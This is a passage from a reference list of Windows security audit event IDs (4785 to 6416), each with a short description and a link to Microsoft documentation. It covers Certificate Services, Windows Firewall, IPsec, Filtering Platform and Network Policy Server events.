group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4785) - [4786: A member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4786) - [4787: A non-member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4787) - [4788: A non-member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4788) - [4789: A basic application group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4789) - [4790: An LDAP query group was 
created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4790) - [4791: An LDAP query group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4791) - [4792: An LDAP query group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4792) - [4793: The Password Policy Checking API was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4793) - [4794: An attempt was made to set the Directory Services Restore Mode administrator password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4794) - [4798: A user's local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4798) - [4799: A security-enabled local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) - [4800: The workstation was locked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4800) - [4801: The workstation was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4801) - [4802: The screen saver was invoked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4802) - [4803: The screen saver was dismissed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4803) - [4816: RPC detected an integrity violation while decrypting an incoming message.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4816) - [4817: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4817) - [4818: Proposed Central Access Policy does not grant the same access permissions as the current Central Access 
Policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4818) - [4819: Central Access Policies on the machine have been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4819) - [4826: Boot Configuration Data loaded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4826) - [4864: A namespace collision was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4864) - [4865: A trusted forest information entry was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4865) - [4866: A trusted forest information entry was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4866) - [4867: A trusted forest information entry was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4867) - [4868: The certificate manager denied a pending certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4868) - [4869: Certificate Services received a resubmitted certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4869) - [4870: Certificate Services revoked a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4870) - [4871: Certificate Services received a request to publish the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4871) - [4872: Certificate Services published the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4872) - [4873: A certificate request extension changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4873) - [4874: One or more certificate request attributes 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4874) - [4875: Certificate Services received a request to shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4875) - [4876: Certificate Services backup started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4876) - [4877: Certificate Services backup completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4877) - [4878: Certificate Services restore started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4878) - [4879: Certificate Services restore completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4879) - [4880: Certificate Services started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4880) - [4881: Certificate Services stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4881) - [4882: The security permissions for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4882) - [4883: Certificate Services retrieved an archived key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4883) - [4884: Certificate Services imported a certificate into its database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4884) - [4885: The audit filter for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4885) - [4886: Certificate Services received a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4886) - [4887: Certificate Services approved a certificate request and issued a 
certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4887) - [4888: Certificate Services denied a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4888) - [4889: Certificate Services set the status of a certificate request to pending.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4889) - [4890: The certificate manager settings for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4890) - [4891: A configuration entry changed in Certificate Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4891) - [4892: A property of Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4892) - [4893: Certificate Services archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4893) - [4894: Certificate Services imported and archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4894) - [4895: Certificate Services published the CA certificate to Active Directory Domain Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4895) - [4896: One or more rows have been deleted from the certificate database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4896) - [4897: Role separation enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4897) - [4898: Certificate Services loaded a template.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4898) - [4902: The Per-user audit policy table was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4902) - [4904: An attempt was made to register a security 
event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4904) - [4905: An attempt was made to unregister a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4905) - [4906: The CrashOnAuditFail value has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4906) - [4907: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4907) - [4908: Special Groups Logon table modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4908) - [4909: The local policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4909) - [4910: The group policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4910) - [4911: Resource attributes of the object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4911) - [4912: Per User Audit Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4912) - [4913: Central Access Policy on the object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4913) - [4928: An Active Directory replica source naming context was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928) - [4929: An Active Directory replica source naming context was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4929) - [4930: An Active Directory replica source naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4930) - [4931: An Active Directory replica destination naming context was 
modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4931) - [4932: Synchronization of a replica of an Active Directory naming context has begun.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4932) - [4933: Synchronization of a replica of an Active Directory naming context has ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4933) - [4934: Attributes of an Active Directory object were replicated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4934) - [4935: Replication failure begins.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4935) - [4936: Replication failure ends.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4936) - [4937: A lingering object was removed from a replica.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4937) - [4944: The following policy was active when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4944) - [4945: A rule was listed when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4945) - [4946: A change has been made to Windows Firewall exception list. A rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4946) - [4947: A change has been made to Windows Firewall exception list. A rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4947) - [4948: A change has been made to Windows Firewall exception list. 
A rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4948) - [4949: Windows Firewall settings were restored to the default values.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4949) - [4950: A Windows Firewall setting has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4950) - [4951: A rule has been ignored because its major version number was not recognized by Windows Firewall.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4951) - [4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4952) - [4953: A rule has been ignored by Windows Firewall because it could not parse the rule.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4953) - [4954: Windows Firewall Group Policy settings have changed. The new settings have been applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4954) - [4956: Windows Firewall has changed the active profile.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4956) - [4957: Windows Firewall did not apply the following rule:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4957) - [4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4958) - [4960: IPsec dropped an inbound packet that failed an integrity check.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4960) - 4961: IPsec dropped an inbound packet that failed a replay check. 
- 4962: IPsec dropped an inbound packet that failed a replay check. - [4963: IPsec dropped an inbound clear text packet that should have been secured.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4963) - [4964: Special groups have been assigned to a new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964) - [4965: IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4965) - [4976: During Main Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4976) - [4977: During Quick Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4977) - [4978: During Extended Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4978) - [4979: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4979) - [4980: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4980) - [4981: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4981) - [4982: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4982) - [4983: An IPsec Extended Mode negotiation failed. 
The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4983) - [4984: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4984) - [4985: The state of a transaction has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4985) - [5024: The Windows Firewall Service has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5024) - [5025: The Windows Firewall Service has been stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5025) - [5027: The Windows Firewall Service was unable to retrieve the security policy from the local storage. The service will continue enforcing the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5027) - [5028: The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5028) - [5029: The Windows Firewall Service failed to initialize the driver. 
The service will continue to enforce the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5029) - [5030: The Windows Firewall Service failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5030) - [5031: The Windows Firewall Service blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5031) - [5032: Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5032) - [5033: The Windows Firewall Driver has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5033) - [5034: The Windows Firewall Driver was stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5034) - [5035: The Windows Firewall Driver failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5035) - [5037: The Windows Firewall Driver detected critical runtime error. Terminating.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5037) - [5038: Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038) - [5039: A registry key was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5039) - [5040: A change has been made to IPsec settings. An Authentication Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5040) - [5041: A change has been made to IPsec settings. 
An Authentication Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5041) - [5042: A change has been made to IPsec settings. An Authentication Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5042) - [5043: A change has been made to IPsec settings. A Connection Security Rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5043) - [5044: A change has been made to IPsec settings. A Connection Security Rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5044) - [5045: A change has been made to IPsec settings. A Connection Security Rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5045) - [5046: A change has been made to IPsec settings. A Crypto Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5046) - [5047: A change has been made to IPsec settings. A Crypto Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5047) - [5048: A change has been made to IPsec settings. 
A Crypto Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5048) - [5049: An IPsec Security Association was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5049) - [5051: A file was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5051) - [5056: A cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5056) - [5057: A cryptographic primitive operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5057) - [5058: Key file operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5058) - [5059: Key migration operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5059) - [5060: Verification operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5060) - [5061: Cryptographic operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5061) - [5062: A kernel-mode cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5062) - [5063: A cryptographic provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5063) - [5064: A cryptographic context operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5064) - [5065: A cryptographic context modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5065) - [5066: A cryptographic function operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5066) - [5067: A cryptographic function modification was 
attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5067) - [5068: A cryptographic function provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5068) - [5069: A cryptographic function property operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069) - [5070: A cryptographic function property modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5070) - [5136: A directory service object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136) - [5137: A directory service object was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5137) - [5138: A directory service object was undeleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5138) - [5139: A directory service object was moved.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5139) - [5140: A network share object was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140) - [5141: A directory service object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5141) - [5142: A network share object was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5142) - [5143: A network share object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5143) - [5144: A network share object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5144) - [5145: A network share object was checked to see whether client can be granted desired 
access.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145) - [5148: The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5148) - [5149: The DoS attack has subsided and normal processing is being resumed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5149) - [5150: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5150) - [5151: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5151) - [5152: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152) - [5153: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5153) - [5154: The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5154) - [5155: The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5155) - [5156: The Windows Filtering Platform has permitted a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156) - [5157: The Windows Filtering Platform has blocked a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157) - [5158: The Windows Filtering Platform has permitted a bind to a local 
port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5158) - [5159: The Windows Filtering Platform has blocked a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5159) - [5168: SPN check for SMB/SMB2 failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5168) - [5376: Credential Manager credentials were backed up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5376) - [5377: Credential Manager credentials were restored from a backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5377) - [5378: The requested credentials delegation was disallowed by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5378) - [5440: The following callout was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5440) - [5441: The following filter was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5441) - [5442: The following provider was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5442) - [5443: The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5443) - [5444: The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5444) - [5446: A Windows Filtering Platform callout has been 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5446) - [5447: A Windows Filtering Platform filter has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5447) - [5448: A Windows Filtering Platform provider has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5448) - [5449: A Windows Filtering Platform provider context has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5449) - [5450: A Windows Filtering Platform sub-layer has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5450) - [5451: An IPsec Quick Mode security association was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5451) - [5452: An IPsec Quick Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5452) - [5453: An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5453) - [5456: PAStore Engine applied Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5456) - [5457: PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5457) - [5458: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5458) - [5459: PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the 
computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5459) - [5460: PAStore Engine applied local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5460) - [5461: PAStore Engine failed to apply local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5461) - [5462: PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5462) - [5463: PAStore Engine polled for changes to the active IPsec policy and detected no changes.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5463) - [5464: PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5464) - [5465: PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5465) - [5466: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5466) - [5467: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. 
The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5467) - [5468: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5468) - [5471: PAStore Engine loaded local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5471) - [5472: PAStore Engine failed to load local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5472) - [5473: PAStore Engine loaded directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5473) - [5474: PAStore Engine failed to load directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5474) - [5477: PAStore Engine failed to add quick mode filter.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5477) - [5478: IPsec Services has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5478) - 5479: IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks. - 5480: IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem. 
- 5483: IPsec Services failed to initialize RPC server. IPsec Services could not be started. - 5484: IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks. - 5485: IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem. - [5632: A request was made to authenticate to a wireless network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5632) - [5633: A request was made to authenticate to a wired network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5633) - [5712: A Remote Procedure Call (RPC) was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5712) - [5888: An object in the COM+ Catalog was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5888) - [5889: An object was deleted from the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5889) - [5890: An object was added to the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5890) - [6144: Security policy in the group policy objects has been applied successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6144) - [6145: One or more errors occurred while processing security policy in the group policy objects.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6145) - [6272: Network Policy Server granted access to a 
user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6272) - [6273: Network Policy Server denied access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6273) - [6274: Network Policy Server discarded the request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6274) - [6275: Network Policy Server discarded the accounting request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6275) - [6276: Network Policy Server quarantined a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6276) - [6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6277) - [6278: Network Policy Server granted full access to a user because the host met the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6278) - [6279: Network Policy Server locked the user account due to repeated failed authentication attempts.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6279) - [6280: Network Policy Server unlocked the user account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6280) - [6281: Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. 
The invalid hashes could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281) - [6400: BranchCache: Received an incorrectly formatted response while discovering availability of content.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6400) - [6401: BranchCache: Received invalid data from a peer. Data discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6401) - [6402: BranchCache: The message to the hosted cache offering it data is incorrectly formatted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6402) - [6403: BranchCache: The hosted cache sent an incorrectly formatted response to the client.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6403) - [6404: BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6404) - [6405: BranchCache: %2 instance(s) of event id %1 occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6405) - [6406: %1 registered to Windows Firewall to control filtering for the following: %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6406) - 6407: N/A - [6408: Registered product %1 failed and Windows Firewall is now controlling the filtering for %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6408) - [6409: BranchCache: A service connection point object could not be parsed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6409) - [6410: Code integrity determined that a file does not meet the security requirements to load into a process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6410) - [6416: A new 
